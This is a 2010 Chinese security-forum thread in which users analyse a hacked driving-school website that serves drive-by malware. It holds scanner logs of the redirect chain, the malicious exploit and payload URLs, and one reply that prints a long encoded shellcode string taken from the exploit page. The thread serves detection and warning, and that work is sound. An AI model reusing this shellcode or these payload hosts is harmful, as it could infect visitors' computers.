收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 网络安全(毒网分析) http://pxjsxx.com/ [挂马][BY basketmn]
12下一页
返回列表 发新帖
查看: 5634|回复: 14
收起左侧

[已鉴定] http://pxjsxx.com/ [挂马][BY basketmn]

[复制链接]
mf88267165
发表于 2010-5-17 12:50:52 | 显示全部楼层 |阅读模式
本帖最后由 basketmn 于 2010-5-17 13:38 编辑

卡巴 报毒  fx报攻击站点  小a报
ps:毛豆版 谷歌浏览器没报 郁闷
回复

举报

basketmn
头像被屏蔽
发表于 2010-5-17 13:39:46 | 显示全部楼层
关于:hxxp://pxjsxx.com/解密的日志(全体输出 -  10):

Level  0>hxxp://pxjsxx.com/
Level  1>hxxp://pxjsxx.com/images/index2.swf
Level  1>hxxp://%72.tli%6Ee%65.co%6D%2E%63n
Level  2>hxxp://o.CAIPIAOYUCE.INFO/xo/dk.html
Level  3>hxxp://kh76t.3322.org:12/.h
Level  1>hxxp://w.l%6Fve%320%312.%69nfo
Level  1>hxxp://q%2E%6C%69gh%742%30%312.%69%6E%66%6F
Level  1>hxxp://%72.tli%6Ee%65.co%6D%2E%63n
Level  1>hxxp://w.l%6Fve%320%312.%69nfo
Level  1>hxxp://q%2E%6C%69gh%742%30%312.%69%6E%66%6F
回复

举报

250662772
发表于 2010-5-17 13:51:57 | 显示全部楼层
**网页分析:250662772 分析工具:mdecoder0.56**
[root]http://pxjsxx.com/(沛县机动车驾驶员培训中心)
    [flash]http://pxjsxx.com/images/index2.swf
    [script]http://r.tlinee.com.cn
        [exp]http://o.CAIPIAOYUCE.INFO/xo/dk.html(Exploit.Ie0dayCVE0806.a)
            [exe]http://kh76t.3322.org:12/.h
    [script]http://w.love2012.info
        [exp]http://o.CAIPIAOYUCE.INFO/xo/dk.html(Exploit.Ie0dayCVE0806.a)
            [exe]http://kh76t.3322.org:12/.h
    [script]http://q.light2012.info
        [exp]http://o.CAIPIAOYUCE.INFO/xo/dk.html(Exploit.Ie0dayCVE0806.a)
            [exe]http://kh76t.3322.org:12/.h
    [script]http://r.tlinee.com.cn
    [script]http://w.love2012.info
    [script]http://q.light2012.info
回复

举报

will
发表于 2010-5-17 14:03:09 | 显示全部楼层

AVG LinkScanner

http://o.CAIPIAOYUCE.INFO/xo/dk.html
Exploit JavaScript Obfuscation (type 738)
2010-05-17_140329.png
回复

举报

promised
发表于 2010-5-17 14:29:45 | 显示全部楼层
domain
  1. http://o.CAIPIAOYUCE.INFO/xo/dk.html
复制代码
shellcode
  1. %u5858%u5858%u10EB%u4B5B%uC933%uB966%u03B8%u3480%uBD0B%uFAE2%u05EB%uEBE8%uFFFF%u54FF%uBEA3%uBDBD%uD9E2%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%uD536%u36B5%uD74A%uE4AC%u0355%uBDBF%u2DBD%u455F%u8ED5%uBD8F%uD5BD%uCEE8%uCFD8%u36E9%uB1FB%u0355%uBDBC%u36BD%uD755%uE4B8%u2355%uBDBF%u5FBD%uD544%uD3D2%uBDBD%uC8D5%uD1CF%uE9D0%uAB42%u7D38%uAEC8%uD2D5%uBDD3%uD5BD%uCFC8%uD0D1%u36E9%uB1FB%u3355%uBDBC%u36BD%uD755%uE4BC%uD355%uBDBF%u5FBD%uD544%u8ED1%uBD8F%uCED5%uD8D5%uE9D1%uFB36%u55B1%uBCD2%uBDBD%u5536%uBCD7%u55E4%uBFF2%uBDBD%u445F%u513C%uBCBD%uBDBD%u6136%u7E3C%uBD3D%uBDBD%uBDD7%uA7D7%uD7EE%u42BD%uE1EB%u7D8E%u3DFD%uBE81%uC8BD%u7A44%uBEB9%uDBE1%uD893%uF97A%uB9BE%uD8C5%uBDBD%u748E%uECEC%uEAEE%u8EEC%u367D%uE5FB%u9F55%uBDBC%u3EBD%uBD45%u1E54%uBDBD%u2DBD%uBDD7%uBDD7%uBED7%uBDD7%uBFD7%uBDD5%uBDBD%uEE7D%uFB36%u5599%uBCBC%uBDBD%uFB34%uD7DD%uEDBD%uEB42%u3495%uD9FB%uFB36%uD7DD%uD7BD%uD7BD%uD7BD%uD7B9%uEDBD%uEB42%uD791%uD7BD%uD7BD%uD5BD%uBDA2%uBDB2%u42ED%u81EB%uFB34%u36C5%uD9F3%uC13D%u42B5%uC909%u3DB1%uB5C1%uBD42%uB8C9%uC93D%u42B5%u5F09%u3456%u3D3B%uBDBD%u7ABD%uCDFB%uBDBD%uBDBD%uFB7A%uBDC9%uBDBD%uD7BD%uD7BD%uD7BD%u36BD%uDDFB%u42ED%u85EB%u3B36%uBD3D%uBDBD%uBDD7%uF330%uECC9%uCB42%uEDCD%uCB42%u42DD%u8DEB%uCB42%u42DD%u89EB%uCB42%u42C5%uFDEB%u4636%u7D8E%u668E%u513C%uBFBD%uBDBD%u7136%u453E%uC0E9%u34B5%uBCA1%u7D3E%u56B9%u364E%u3671%u3E64%uAD7E%u7D8E%uECED%uEDEE%uEDED%uEDED%uEAED%uEDED%uEB42%u36B5%uE9C3%uAD55%uBDBC%u55BD%uBDD8%uBDBD%uDED5%uCACB%uD5BD%uD5CE%uD2D9%u36E9%uB1FB%u9955%uBDBD%u34BD%u81FB%u1CD9%uBDB9%uBDBD%u1D30%u42DD%u4242%uD8D7%uCB42%u3681%uADFB%uB555%uBDBD%u8EBD%uEE66%uEEEE%u42EE%u3D6D%u5585%u853D%uC854%u3CAC%uB8C5%u2D2D%u2D2D%uB5C9%u4236%u36E8%u3051%uB8FD%u5D42%u1B55%uBDBD%u7EBD%u1D55%uBDBD%u05BD%uBCAC%u3DB9%uB17F%u55BD%uBD2E%uBDBD%u513C%uBCBD%uBDBD%u4136%u7A3E%u7AB9%u8FBA%u2CC9%u7AB1%uB9FA%u34DE%uF26C%uFA7A%u1DB5%u2AD8%u7A76%uB1FA%uFDEC%uC207%uFA7A%u83AD%u0BA0%u7A84%uA9FA%uD405%uA669%uFA7A%u03A5%uDBC2%u7A1D%uA1FA%u1441%u108A%uFA7A%u259D%uADB7%uD945%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%uD536%u36B5%uD74A%uE4B9%uE955%uBDBD%u2DBD%u455F%u8ED5%uBD8F%uD5BD%uCEE8%uCFD8%u36E9%u55BB%u42E8%u4242%u5536%uB8D7%u55E4%uBD88%uBDBD%u445F%u428E%u42EA%uB9EB%uBF56%u7EE5%u4455%u4242%uE642%uBA7B%u3405%uBCE2%u7ADB%uB8FA%u5D42%uEE7E%u6136%uD7EE%uD5FD%uADBD%uBDBD%u36EA%u9DFB%uA555%u4242%uE542%uEC7E%u36EB%u81C8%uC936%uC593%u48BE%u36EB%u9DCB%u48BE%u748E%uFCF4%uBE10%u8E78%uB266%uAD03%u6B87%uB5C9%u767C%uBEBA%uFD67%u4C56%uA286%u5AC8%u36E3%u99E3%u60BE%u36DB%uF6B1%uE336%uBEA1%u3660%u36B9%u78BE%uE316%u7EE4%u6055%u4241%u0F42%u5F4F%u8449%uC05F%u673E%uC6F5%u8F80%u2CC9%u38B1%u1262%uDE06%u6C34%uECF2%u07FD%u1DC2%u2AD8%uA376%uD919%u2E52%u598F%u3329%uB7AE%u7F11%uF6A4%u79BC%uA230%uEAC9%uB0DB%uFE42%u1103%uC066%u184D%uEF27%u1A43%u8367%u0BA0%u0584%u69D4%u03A6%uDBC2%u411D%u8A14%u2510%uADB7%u3D45%u126B%u4627%uA8EE%ud5db%uc9c9%u87cd%u9292%ud5d6%u8b8a%u93c9%u8e8e%u8f8f%ud293%udacf%u8c87%u928f%ud593%ubdbd%ubdbd
复制代码
exe
  1. kh76t.3322.org:12/.h
复制代码
回复

举报

神墓
发表于 2010-5-17 16:25:52 | 显示全部楼层
我的小A怎么没报啊
回复

举报

小淘气
头像被屏蔽
发表于 2010-5-17 17:23:50 | 显示全部楼层
我的瑞星也没抱
回复

举报

Napelon
发表于 2010-5-17 17:41:29 | 显示全部楼层
我的chromeplus报了
回复

举报

change_018
发表于 2010-5-17 18:53:04 | 显示全部楼层
FF报攻击页面
回复

举报

mf88267165
 楼主| 发表于 2010-5-18 10:38:26 | 显示全部楼层
回复 2# basketmn


    在看看 这个网页 还有马么?
回复

举报

下一页 »
12下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-1-19 07:10 , Processed in 0.133511 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表